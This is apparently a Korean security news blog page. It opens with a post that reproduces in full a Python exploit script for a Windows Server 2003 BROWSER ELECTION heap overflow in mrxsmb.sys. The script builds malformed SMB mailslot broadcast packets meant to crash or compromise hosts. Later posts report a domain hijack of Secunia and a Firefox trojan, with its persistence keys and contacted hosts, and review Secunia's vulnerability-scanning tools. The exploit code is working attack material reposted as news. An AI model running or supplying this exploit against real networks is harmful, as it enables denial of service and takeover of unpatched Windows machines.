지난 2월 13일에 Cupidon-3005이라는 별명을 사용하는 보안 전문가가 exploit-db.com에 새로운 윈도우 관련 제로데이 익스플로잇을 공개했습니다.

####################################################################################
#MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow
#Release date: 2011-02-14
#Author: Cupidon-3005
#Greet: Winny Thomas, Laurent Gaffie, h07
#Bug: Heap Overflow
#Remote Exploitability: Unlikely
#Local Exploitability: Likely
#Context: Broadcast, Pre-Auth
#####################################################################################
#Mrxsmb.sys, around BowserWriteErrorLog+0x175, while trying to copy 1go from ESI to EDI ...
#Code will look something like this:
#if ((Len + 1) * sizeof(WCHAR)) > TotalBufferSize) { Len = TotalSize/sizeof(WCHAR) - 1; }
#-1 causes Len to go 0xFFFFFFFF
#Feel free to reuse this code without restrictions...
  
import socket,sys,struct
from socket import *
  
if len(sys.argv)<=4:    
 sys.exit("""usage: python sploit.py UR-IP BCAST-IP NBT-NAME AD-NAME 
 example: python sploit.py 192.168.1.10 192.168.1.255 OhYeah AD-NETBIOS-NAME""")
  
ourip = sys.argv[1]
host = sys.argv[2]
srcname = sys.argv[3].upper()
dstname = sys.argv[4].upper()
  
  
ELEC            = "\x42\x4f\x00"
WREDIR          = "\x41\x41\x00"
  
def encodename(nbt,service):
    final = '\x20'+''.join([chr((ord(i)>>4) + ord('A'))+chr((ord(i)&0xF) + ord('A')) for i in nbt])+((15 - len(nbt)) * str('\x43\x41'))+service
    return final
  
def lengthlittle(packet,addnum):
    length = struct.pack("<i", len(packet)+addnum)[0:2]
    return length
  
def lengthbig(packet,addnum):
    length = struct.pack(">i", len(packet)+addnum)[2:4]
    return length
  
def election(srcname):
    elec = "\x08"
    elec+= "\x09" #Be the boss or die
    elec+= "\xa8\x0f\x01\x20" #Be the boss or die
    elec+= "\x1b\xe9\xa5\x00" #Up time
    elec+= "\x00\x00\x00\x00" #Null, like SDLC
    elec+= srcname+"\x00"
    return elec
  
def smbheaderudp(op="\x25"):
    smbheader= "\xff\x53\x4d\x42"
    smbheader+= op 
    smbheader+= "\x00"
    smbheader+= "\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00\x00\x00\x00\x00\x00\x00" 
    smbheader+=  "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    return smbheader
  
  
def trans2mailslot(tid="\x80\x0b",ip=ourip,sname="LOVE-SDL",dname="SRD-LOVE",namepipe="\MAILSLOT\BROWSE",srcservice="\x41\x41\x00",dstservice="\x41\x41\x00",pbrowser=""):
    packetbrowser  =  pbrowser                             
    packetmailslot = "\x01\x00"                            
    packetmailslot+= "\x00\x00"                            
    packetmailslot+= "\x02\x00"                            
    packetmailslot+= lengthlittle(packetbrowser+namepipe,4)
    packetmailslot+= namepipe +"\x00"
    packetdatagram = "\x11"
    packetdatagram+= "\x02"
    packetdatagram+= tid 
    packetdatagram+= inet_aton(ip)
    packetdatagram+= "\x00\x8a"
    packetdatagram+= "\x00\xa7"
    packetdatagram+= "\x00\x00"
    packetdatagramname = encodename(sname,srcservice)
    packetdatagramname+= encodename(dname,dstservice)
    smbheader= smbheaderudp("\x25")
    packetrans2 = "\x11"
    packetrans2+= "\x00\x00" 
    packetrans2+= lengthlittle(packetbrowser,0)
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00"
    packetrans2+= "\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\xe8\x03\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= lengthlittle(packetbrowser,0)
    packetrans2+= lengthlittle(smbheader+packetrans2+packetmailslot,4)
    packetrans2+= "\x03"
    packetrans2+= "\x00"
    andoffset = lengthlittle(smbheader+packetrans2+packetmailslot,2)
    lengthcalc = packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
    packetfinal = packetdatagram+packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
    packetotalength = list(packetfinal)
    packetotalength[10:12] = lengthbig(lengthcalc,0)
    packetrans2final = ''.join(packetotalength)
    return packetrans2final
  
def sockbroad(host,sourceservice,destservice,packet):
   s = socket(AF_INET,SOCK_DGRAM)
   s.setsockopt(SOL_SOCKET, SO_BROADCAST,1)
   s.bind(('0.0.0.0', 138))
   try:
      packsmbheader = smbheaderudp("\x25")
      buffer0 = trans2mailslot(tid="\x80\x22",ip=ourip,sname=srcname,dname=dstname,namepipe="\MAILSLOT\BROWSER",srcservice=sourceservice, dstservice=destservice, pbrowser=packet)
      s.sendto(buffer0,(host,138))
   except:
      print "expected SDL error:", sys.exc_info()[0]
      raise
   
sockbroad(host,WREDIR,ELEC,election("A" * 410)) # -> Zing it! (between ~60->410)
print "Happy St-Valentine Bitches\nMSFT found that one loooooooong time ago...."



물론 이 문제는 아직 해결되지 않았으며 마이크로소프트가 전모를 파악하여 분석 중에 있습니다.

문제점의 원인은 mrxsmb.sys 파일에 포함된 BrowserWriteErrorLogEntry() 함수에서 적벌한 처리가 이뤄지지 않아 버퍼 오버플로 오류가 발생하는 것으로 알려지고 있습니다. mrxsmb.sys 파일은 윈도우에서 네트워크 통신을 하는 과정에서 사용하는 SMB(Server Message Block) 프로토콜에 요청하는 프로세스를 처리하는 드라이버 파일입니다.

독일의 보안 기업인 Vupen이 검토한 바에 따르면 이 문제점은 치명적(Critical)인 것으로 간주되며 이로 인해 서비스 거부나 시스템 장악과 같은 결과를 낳을 수 있다고 합니다. 물론, 윈도우의 블루스크린(BSOD)를 유발할 수도 있습니다.

또다른 보안 기업인 Secunia에서는 5단계 위험 기준에서 3번째인 일반(moderately critical)로 분류했습니다.

현재 제로데이코드는 윈도우 2003 서버 제품에 한정되어 올라와 있지만 앞에서 언급한 보안 기업의 확인에 따르면 Windows XP SP3와 Windows 2003 SP2 버전뿐만 아니라 다른 윈도우 제품에서도 대부분 발생한다고 합니다.

MS의 보안 업데이트 정책상 다음달 8일에 정기 보안 업데이트가 예정되어 있지만, 이 취약점에 대한 조사가 완료된 후에야 긴급 업데이트를 할지 아니면 다음달에 처리할지 결정될 것이라고 합니다.

감사합니다.

출처: http://www.exploit-db.com/exploits/16166/
reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus

    취약점 분석 및 관리 솔루션을 인터넷에서 전파하고 있는 보안 전문 기업인 시큐니아(www.secunia.com)이 DNS를 이용한 공격을 통해 해킹을 당했습니다. 그 결과 터키어로 표현한 다른 웹페이지를 보여주는 결과를 가져왔습니다.

    사건이 발생한 것은 11월 25일 00:40(AM CET)이며 시큐니아를 방문하게 되면 아래 화면과 같이 터키어로 된 웹페이지가 나타나게 됩니다.

    공격의 원인은 DNS 호스팅 기관에서 제대로 된 DNS 값을 제공하지 못해서 인것으로 보이며 현재 조사중에 있습니다.

    참고로 시큐니아 웹서버의 IP 주소는 213.150.41.226이며, 덴마크에 할당된 주소입니다.

    하지만, SANS ISC에 따르면 공격이 진행되는 동안에 도메인은 81.95.49.32 IP 주소를 가리켰으며, 이 IP 주소는 Avensys Networks라는 영국 회사에서 관리하는 것으로 알려졌습니다.

    도메인 관리 기관에서 도메인의 NS 서버 주소를 바꿔치하여 도메인을 갈취하는 형태의 공격을 Domain Hijacking이라고 합니다.

    출처: http://cyberinsecure.com/vulnerability-research-vendor-secuniacom-domain-hijacked-and-defaced/

    reTweet
    Posted by 문스랩닷컴
    blog comments powered by Disqus
      보안 전문 기업인 Norman에서 근무하는 보안 전문가에 따르면 파이어폭스(Firefox) 브라우저의 취약점을 이용하여 트로이목마를 PC에 다운로드케하는 공격이 발견되었다고 합니다.

      이 공격은 노벨상 웹사이트의 해킹을 조사하는 과정에서 발견되었으며, 웹사이트의 해킹 뿐만 아니라 변조까지 이뤄진 것으로 알려졌습니다.

      이 취약점은 파이어폭스 v3.5와 v3.6 버전에서 발생하고 있으며 아직까지 구체적인 공격 대상이 밝혀지지는 않았습니다.

      취약점을 통해 공격이 성공적으로 이뤄지면, %WINDOWS%\temp 폴더에 symantec.exe 라는 이름의 트로이목마 설치 프로그램을 다운로드합니다.

      그리고, 윈도우 부팅시에 자동으로 시작되도록 아래 레지스트리에 경로를 등록합니다.

      * HKCU\Software\Microsoft\Windows\CurrentVersion\Run
      * HKLM\Software\Microsoft\Windows\CurrentVersion\Run

      설치가 완료되면 몇가지 의심스러운 동작을 수행하는데 다음과 같습니다.

      * nobel.usagov.mooo.com, update.microsoft.com 사이트에 HTTP(#80) 포트로 접속 시도
      * l-3com.dyndns-work.com, l-3com.dyndns.tv 에 접속을 시도

      하지만, 어떠한 연유로 microsoft.com에 접속하는지 아직 명확히 밝혀진 점은 없습니다.

      최근에 발생하는 보안 이슈들을 살펴 보면, 윈도우 운영체제 보다는 아도브(PDF), 자바와 같이 애플리케이션 단에서 발생하는 경우가 더 많습니다. Secunia의 PSI와 같은 보조 솔루션을 심각하게 검토해야 할 단계가 아닌지 모르겠습니다.

      Secunia의 PSI(Personal Software Inspector)
      http://moonslab.com/408

      출처: http://www.norman.com/security_center/virus_description_archive/129146/
      reTweet
      Posted by 문스랩닷컴
      blog comments powered by Disqus

        PSI 정식 버전이 출시되었습니다.
        http://secunia.com/vulnerability_scanning/personal/


        보안 회사로 정평이 나 있는 Secunia에서 새로운 보안 패치 점검 도구인 Secunia PSI(Personal Software Inspector)의 베타 버전을 공개했다.

        http://psi.secunia.com

        기존에 제공하는 보안 패치 도구에 대한 자료는 아래 링크를 참고한다.

        이 번에 새로 발표한 제품은 Secunia PSI로 컴퓨터에 저장된 실행 파일(.exe나 .dll 등등)의 시그내처를 검사하여 해당 파일에 보안상 취약점이 있는지 알려 주는 보안 점검 프로그램이다. 중요한 점은 윈도우뿐만 아니라 다양한 그리고 유명한 프로그램들까지도 점검해준다.

        사용자 삽입 이미지

        Secunia PSI를 사용할 수 있는 운영 체제는 Windows XP SP2, Windows 2003, Windows 2000 SP4 등이며 지원 언어는 영어 및 유럽 일부 언어만을 지원한다. 하지만, 실제 테스트 결과 Windows XP SP2 한글판에서도 동작한는 것으로 보인다.

        주요 특징은 다음과 같다.

        • 사용자가 쉽게 보안을 측정할 수 있도록 점수 방식으로 보여 준다.
        • 설치 후 자동으로 컴퓨터에 취약점이 있는 소프트웨어를 찾아 준다.
        • 안전하지 않은(InSecure)/버전업이 끝난(End-of-Life) 소프트웨어도 찾아서 업데이트할 수 있다.
        • 보안 업데이트나 핫픽스가 있는 경우에 다운로드 링크를 제공한다
        • 약 4,200개 이상의 애플리케이션에서 찾을 수 있다.

        아래 그림은 필자의 데모 PC에서 Secunia PSI를 돌린 결과이다. 대부분의 프로그램에서 경고(!)가 나타난다. 파란색과 빨간색 아이콘을 클릭하여 최신 업데이트 등의 보안 방법을 찾아서 설치할 수 있게 된다.

        사용자 삽입 이미지

        매달 윈도우 보안 업데이트만 하지말고 각종 프로그램의 업데이트도 설치합시다!

         by 보안 광고 프로그램



         

        reTweet
        Posted by 문스랩닷컴
        blog comments powered by Disqus
          모질라 재단에서 개발하고 있는 파이어폭스(FireFox) 브라우저에 취명적인 취약점이 있다는 사실이 Secunia를 통해 알려졌다. Secunia는 윈도우 XP 환경에서 파이어폭스 2.0.0.4 버전에서 이러한 문제점이 있다는 것을 확인했다.

          이 취약점은 브라우저에서 주소를 입력하는 부분(handler)에서 "firefoxurl://"을 처리하는데서 발생하며, 악의를 가진 웹 사이트의 관리자는 웹 사이트를 방문하는 사용자의 컴퓨터에서 악성 코드를 실행할 수 있다고 한다.
          사용자 삽입 이미지

          참고로, 파이어폭스에서는 ftp://, aim:// 등과 같은 핸들러가 내장되어 제공되는데 웹 페이지를 방문할 때 브라우저에 특정한 동작 또는 특정한 프로토콜을 사용하게 한다.

          모질라는 블로그를 통해 기존 버전 2.0.0.4를 업데이트하는 2.0.0.5가 발표될 것이라고 언급했다.

          현재 이문제를 해결하는 업데이트는 없으므로 사용자는 가급적 위험한 사이트의 방문을 하지 않는 것이 좋다고 합니다.

          감사합니다.
          reTweet
          Posted by 문스랩닷컴
          blog comments powered by Disqus

            사용자 삽입 이미지

            보안 회사로 유명한 시큐니아(http://www.secunia.com)에서는 내부 네트워크의 취약점을 찾아내어 알려 주는 프로그램인 Network Software Inspector를 베타 테스트할 수 있는 등록 과정을 진행한다고 밝혔습니다.

            한편, 지난 1월에는 시큐니아 온라인 소프트웨어 인스펙터라는 제품을 발표 했는데, 이 프로그램은 컴퓨터에 깔려 있는 프로그램의 취약점을 알려 줍니다. 자세한 내용은 http://moonslab.com/116를 참고하세요.

            Network Software Inspector의 기능은 다음과 같습니다.

            • 단일 파일로 구성되며, 실행파일임. 1MB 이내의 크기로 다운로드하여 실행하며, 설치 과정이 필요 없음.
            • 온라인 소프트웨어 인스펙터 기능이외 다양한 기능을 제공
            • 4,000개 이상의 애플리케이션을 감지하고 취약점을 분석(온라인 소프트웨어 인스펙터는 대략 30 여가지의 애플리케이션만 지원함)
            • 벤더가 제공한 프로그램의 모든 버전을 감지
            • 짧은 시간 내에 원격지 호스트를 감지할 수 있는 효율적인 규칙 제공
            • 기존 취약점 분석 프로그램보다 훨씬 정확한 결과를 제공

            사용자 삽입 이미지
            사용자 삽입 이미지
            사용자 삽입 이미지
            사용자 삽입 이미지


            등록 기간은 아직 정확한 만료 일자가 나와 있지 않고, 또한 베타 테스트 일정도 아직 공지되지 않았습니다.

            베타 등록 : http://secunia.com/Network_Software_Inspector/

            reTweet
            Posted by 문스랩닷컴
            blog comments powered by Disqus
                시큐니아(http://www.secunia.com)는 전세계적으로 유명한 보안 업체입니다. 대부분의 윈도우에 관련된 보안 취약점 등은 이 곳에서 발표될 정도입니다. 또한, 다양하면서도 풍부한 데이터베이스를 보유하고 있어, 보안에 관련한 최고의 사이트가 아닐까 감히 말씀드릴 수 있습니다.

                시큐니아에서는 윈도우 보안패치를 점검하여 어떤 패치가 설치되어 있지 않는지 점검할 수 있는 온라인 패치 점검 서비스를 제공합니다. 우리나라에서는 한국정보보호원(http://www.boho.co.kr)에서도 이러한 서비스를 제공합니다만, 우리나라 공공기관의 특성 아니 우리나라 웹사이트의 특징인 ActiveX 컨트롤을 설치합니다. T.T;

              하지만, 시큐니아에서 제공하는 서비스는 윈도우 뿐만 아니라 아래의 목록과 같이 우리가 많이 사용하는 프로그램에 숨겨져 있는 보안 취약점을 알려 주고, 새로운 패치가 있는 경우에도 알려 줍니다.


              점검 사항
              • 설치된 응용 프로그램이 보안상 취약한 버전인지 점검
              • 모든 마이크로스프트사 제품 점검
              • 시스템과 응용 프로그램을 손쉽게 업그레이드할 수 있도록 지원
              • 별도의 프로그램이나 Active-X 컨트롤을 설치하지 않고 자바를 이용하여 브라우저에서 손쉽게 실행

              동작 원리

              1. Secunia Software Inspector는 시큐니아가 보유한 "Secunia File Signatures"를 바탕으로 윈도우와 응용 프로그램가 설치되어 있는지 확인합니다.

              2. "Secunia Advisory Intelligence"를 통해 검색한 윈도우와 응용 프로그램 목록이 최신 버전인지 그리고 보안상 취약한 버전인지 확인합니다

              3. 윈도우에 설치되지 않은 보안 취약점, 보안 취약점이 있는 응용 프로그램, 구 버전이 설치된 응용 프로그램을 어떻게 업데이트할지 알려 주는 보고서를 산출합니다.


              점검 사항

              취약점 점검의 가장 큰 목적은 바로 마이크로소프트 윈도우의 보안 패치가 정확히 빠짐없이 설치되었는지 살펴 보는 것일 것입니다. 하지만, Secunia Software Inspector는 윈도우뿐만 아니라 우리가 자주 사용하는 응용 프로그램의 보안 취약점, 구버전 여부를 알려 주어 한층 다양한 보안 서비스를 제공한다고 볼 수 있습니다.

              • 인터넷 브라우저
                • Microsoft Internet Explorer 6.x/7.x
                • Mozilla Firefox 1.x/2.0.x
                • Opera 7.x/8.x/9.x
              • 메신저 프로그램
                • Microsoft MSN Messenger 6.x/7.x
                • Microsoft Live Messenger 8.x
                • AOL Instant Messenger 5.x
                • Yahoo! Messenger 6.x/7.x/8.x
              • 이메일 클라이언트
                • Microsoft Outlook Express 6.x
                • Mozilla Thunderbird 0.x/1.0.x/1.5.x
                • Eudora 6.x/7.x
              • 미디어 플레이어
                • Windows Media Player 8.x/9.x/10.x/11.x
                • Apple Quicktime 5.x/6.x/7.x
                • iTunes 4.x/5.x/6.x/7.x
                • Winamp 2.x/3.x/4.x
                • Real OnePlayer 1.x/2.x
                • Real Player 6/10.x
              • 운영 체제
                • Windows XP Home/Professional
                • Windows 2000 Professional/Server
                • Windows 2003 Server Standard/Web Edition
                • Windows Mobile 2003
              • 응용 프로그램
                • Adobe Acrobat Reader 4.x/5.x/6.x/7.x/8.x
                • Adobe Flash Player 9.x
                • Macromedia Flash Player 4.x/5.x/6.x/7.x/8.x
                • Skype 1.x/2.x/3.x
                • Winzip 8.x/9.x/10.x/11.x
              • 시스템 프로그램
                • Java JRE 1.5x, 5x/1.6x, 6x
                • ZoneAlarm 6.x


              사용 방법

              Secunia Software Inspector는 웹 브라우저 상에서 곧바로 실행할 수 있는 장점을 지니고 있습니다. 다만, 점검하고자 하는 컴퓨터에 자바 가상 머신(javavm, Java JRE 5)이 설치되어 있어야 합니다. Java는 http://www.java.com에서 다운로드하여 설치할 수 있습니다.

              웹 브라우저를 열고, http://secunia.com/software_inspector/를 엽니다. 아래 그림과 같이, Start Now 버튼을 클릭하면 보안 점검이 시작됩니다.

              사용자 삽입 이미지

              자바 JRE가 성공적으로 로드되면 다음 그림과 같이 검사를 위한 시작중지 버튼이 보여지고, 실시간으로 점검하는 상황을 보여 줍니다.

              사용자 삽입 이미지

              Start 버튼을 클릭하면, 위 그림의 오른쪽 아래 구석에 있는 레이다~ 모양의 그림이 빨간색으로 변하면서 점검되고 있다고 알려 줍니다. 만약, 오류가 발생하거나 화면이 먹통이 되어 있는 것처럼 보이는 경우에는 자바가 제대로 실행되지 않은 것이므로, 자바 JRE를 설치하거나 시스템을 재부팅하고 처음부터 검사 과정을 다시 시작합니다.

              Enable thorough system inspection: 각 응용 프로그램은 기본적으로 설치되는 폴더가 있습니다. Secunia Software Inspector는 이러한 기본 경로만을 검색합니다. 하지만, 사용자가 보통 C 드라이브가 아닌 D, E에 설치를 하거나, 하위 경로(ex. C:\Program Files\)를 다르게 선택하여 설치하게 되면 프로그램을 제대로 찾아 내지 못합니다. 이 옵션을 사용하면 컴퓨터의 하드 드라이브에 있는 모든 드라이브 및 경로를 샅샅이 뒤져서 설치된 응용 프로그램을 찾아 냅니다. 확실하게 찾아 낼 수 있다는 장점도 있지만, 그만큼 시간이 더 소용된다는 것을 쉽게 알 수 있을 것입니다.

              시간이 걸릴 수 있으니, 잠시 여유가 있을 때 실행하는 것이 좋습니다. 검사가 모두 마치게 되면 아래 그림과 같이 팝업 창으로 알려 주므로 편리합니다.
              사용자 삽입 이미지

              점검 결과를 볼까요? 현재 사용하는 노트북의 보안 취약점을 아래의 그림과 같이 카테고리 별로 프로그램 별로 보여 줍니다. 취약점/설치하지 않은 패치가 있는 경우 자세한 세부 정보까지도 제공하므로 사용자가 적절한 처리를 할 수 있도록 도와 줍니다.

              점검 보고서가 매우 길기 때문에 몇 개의 그림으로 잘라서 설명해 볼까요?

              사용자 삽입 이미지

              왼쪽 사항을 간단히 설명해 보면,

              • Detection Statistics에서는 찾아낸 프로그램의 갯수와 발견한 취약점/보안에 약한 프로그램 버전의 갯수를 보여줍니다.
              • Running For는 검사 시간을 나타냅니다.
              • Errors Detected는 검사 도중에 발생한 오류를 나타냅니다.
              • Status / Currently Processing은 검사하는 상황(파일 이름) 및 완료되었다는 것을 알려 줍니다.

              사용자 삽입 이미지

              응용 프로그램의 버전과 상태를 일목요연하게 보여줍니다. 최신 버전이거나 보안상 취약점이 없는 프로그램은 초록색 체크버튼으로 표시하고, 마지막 Wnamp 5.0x과 같이 문제가 있는 항목은 가위표로 표시합니다. 그리고, 바로 아래 부분에 자세한 정보를 보여 줍니다.

              사용자 삽입 이미지

              위의 Winamp를 예로 들자면, 현재 설치된 해당 버전이 구 버전(5.2.1.497)이고, 보안상 취약점(Secunia advisory SA2250)을 가지고 있으며, 업데이트 버전을 다운로드할 수 있는 링크(http://www.winamp.com/player)를 알려 줍니다. 마지막 부분에는 파일이 설치된 경로를 알려 줍니다.

              여담이지만, 필자의 노트북 컴퓨터를 점검한 결과, 윈도우에 관련된 패치는 모두 OK이지만, 응용 프로그램에서 5개의 취약점이 발견되었다. 여러분 컴퓨터도 그정도는 나오지 않을까 싶다.

              주의 사항: Secunia Software Inspector는 최신 그리고 앞으로 발표될 보안 취약점에 대해서 점검이 불가능하다는 점을 명심해야 합니다. 따라서, 주기적으로 사이트를 방문하여 점검하길 추천합니다.





              reTweet
              Posted by 문스랩닷컴
              blog comments powered by Disqus


                Web Analytics Blogs Directory